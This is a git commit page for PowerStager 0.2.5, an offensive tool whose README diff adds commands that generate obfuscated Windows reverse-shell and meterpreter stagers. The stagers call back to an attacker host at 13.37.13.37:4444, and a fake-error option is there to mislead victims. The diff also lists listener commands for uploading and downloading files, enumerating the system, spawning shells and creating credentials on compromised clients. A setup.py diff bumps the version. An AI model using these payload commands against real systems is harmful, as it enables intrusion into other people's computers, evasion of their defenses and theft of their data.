Commit of PowerStager version 0.2.5
This commit is contained in:
z0noxz
126
README.md
126
README.md
@@ -17,27 +17,143 @@ Additional methods allows the payload to be embedded into the 'stager' and tempo
|
||||
|
||||
Not only are powershell powerful when managing Windows, it's also powerful when exploiting Windows. This script exploits multiple Windows features such as its inherit trust of powershell, interpretation of shorthand syntaxes, code evaluation and more...
|
||||
|
||||
Demo
|
||||
----
|
||||
[](https://vid.me/Tfzr "powerstager demo - Click to Watch!")
|
||||
|
||||
How to use
|
||||
----------
|
||||
|
||||
Prerequisites:
|
||||
|
||||
python3
|
||||
python3-setuptools
|
||||
i686-w64-mingw32-gcc
|
||||
x86_64-w64-mingw32-gcc
|
||||
i686-w64-mingw32-windres
|
||||
x86_64-w64-mingw32-windres
|
||||
|
||||
Prerequisites (python3 modules):
|
||||
|
||||
os
|
||||
sys
|
||||
getopt
|
||||
glob
|
||||
socket
|
||||
fcntl
|
||||
errno
|
||||
string
|
||||
re
|
||||
random
|
||||
base64
|
||||
datetime
|
||||
time
|
||||
hashlib
|
||||
readline
|
||||
signal
|
||||
urllib
|
||||
names
|
||||
|
||||
Install it:
|
||||
|
||||
git clone https://github.com/z0noxz/powerstager
|
||||
cd powerstager
|
||||
sudo ./setup.py install
|
||||
|
||||
Generate a reverse shell payload to upload:
|
||||
|
||||
powerstager --target win64 \
|
||||
--reverse-shell \
|
||||
--lhost 13.37.13.37 \
|
||||
--lport 4444 \
|
||||
--generate \
|
||||
--output out.ps1
|
||||
|
||||
powerstager --target win64 \
|
||||
--url <url pointing the the uploaded payload> \
|
||||
--output out.exe
|
||||
|
||||
Generate an embedded reverse shell payload, with obfuscation and fake-error:
|
||||
|
||||
powerstager --target win64 \
|
||||
--reverse-shell \
|
||||
--lhost 13.37.13.37 \
|
||||
--lport 4444 \
|
||||
--obfuscation \
|
||||
--fake-error \
|
||||
--output out.exe
|
||||
|
||||
Generate a meterpreter payload to upload:
|
||||
|
||||
powerstager -t win64 -o out.ps1 -m --lhost 13.37.13.37 --lport 4444 --generate
|
||||
powerstager -t win64 -o out.exe -u <url pointing the the uploaded payload>
|
||||
powerstager --target win64 \
|
||||
--meterpreter \
|
||||
--lhost 13.37.13.37 \
|
||||
--lport 4444 \
|
||||
--generate \
|
||||
--output out.ps1
|
||||
|
||||
powerstager --target win64 \
|
||||
--url <url pointing the the uploaded payload> \
|
||||
--output out.exe
|
||||
|
||||
Generate an embedded meterpreter payload:
|
||||
Generate an embedded meterpreter payload, with obfuscation and fake-error:
|
||||
|
||||
powerstager -t win64 -o out.exe -m --lhost 13.37.13.37 --lport 4444
|
||||
powerstager --target win64 \
|
||||
--meterpreter \
|
||||
--lhost 13.37.13.37 \
|
||||
--lport 4444 \
|
||||
--obfuscation \
|
||||
--fake-error \
|
||||
--output out.exe
|
||||
|
||||
Generate an embedded custom payload:
|
||||
|
||||
powerstager -t win64 -o out.exe -p input.ps1
|
||||
powerstager --target win64 \
|
||||
--path input.ps1
|
||||
--output out.exe
|
||||
|
||||
Open a reverse shell listener:
|
||||
|
||||
powerstager --listener \
|
||||
--lport 4444
|
||||
|
||||
Reverse shell listener commands:
|
||||
* Local-Invoke
|
||||
*Invokes powershell script files from host*
|
||||
|
||||
* Local-Import-Module
|
||||
*Imports powershell modules from host*
|
||||
|
||||
* Local-Set-Width
|
||||
*Changes the buffer width on remote client*
|
||||
|
||||
* Local-Upload
|
||||
*Uploads files from host*
|
||||
|
||||
* Local-Download
|
||||
*Downloads files from client*
|
||||
|
||||
* Local-Download-Commands
|
||||
*Downloads available powershell commands from client*
|
||||
|
||||
* Local-Enumerate-System
|
||||
*Runs enumeration scripts on client*
|
||||
|
||||
* Local-Check-Status
|
||||
*Collects user and privilage status from client*
|
||||
|
||||
* Local-Spawn-Meterpreter
|
||||
*Spawns meterpreter shells on client*
|
||||
|
||||
* Local-Spawn-Reverse-Shell
|
||||
*Spawns reverse shells on client*
|
||||
|
||||
* Local-Credential-Create
|
||||
*Creates credentials on client*
|
||||
|
||||
* Local-Credential-List
|
||||
*Lists created credentials on client*
|
||||
|
||||
|
||||
## DISCLAIMER:
|
||||
You shall not misuse this tool to gain unauthorized access. This tool should only be used to expand knowledge, and not for causing malicious or damaging attacks. Performing any attacks without written permission from the owner of the system is illegal.
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
17
setup.py
17
setup.py
@@ -3,13 +3,13 @@ from setuptools import setup
|
||||
|
||||
setup(
|
||||
name="PowerStager",
|
||||
version="0.2",
|
||||
version="0.2.5",
|
||||
description="This script creates an executable stager that downloads a selected powershell payload.",
|
||||
author="z0noxz",
|
||||
author_email="z0noxz@mail.com",
|
||||
url="https://github.com/z0noxz/powerstager",
|
||||
classifiers=[
|
||||
"Development Status :: 2 - Beta",
|
||||
"Development Status :: 0.2.5 - Beta",
|
||||
"Intended Audience :: Developers",
|
||||
"Intended Audience :: End Users/Desktop",
|
||||
"Natural Language :: English",
|
||||
@@ -20,10 +20,21 @@ setup(
|
||||
"os",
|
||||
"sys",
|
||||
"getopt",
|
||||
"glob",
|
||||
"socket",
|
||||
"fcntl",
|
||||
"errno",
|
||||
"string",
|
||||
"re",
|
||||
"random",
|
||||
"base64",
|
||||
"hashlib"
|
||||
"datetime",
|
||||
"time",
|
||||
"hashlib",
|
||||
"readline",
|
||||
"signal",
|
||||
"urllib",
|
||||
"names",
|
||||
],
|
||||
scripts=["bin/powerstager"],
|
||||
packages=["powerstager"]
|
||||
|
||||
Reference in New Issue
Block a user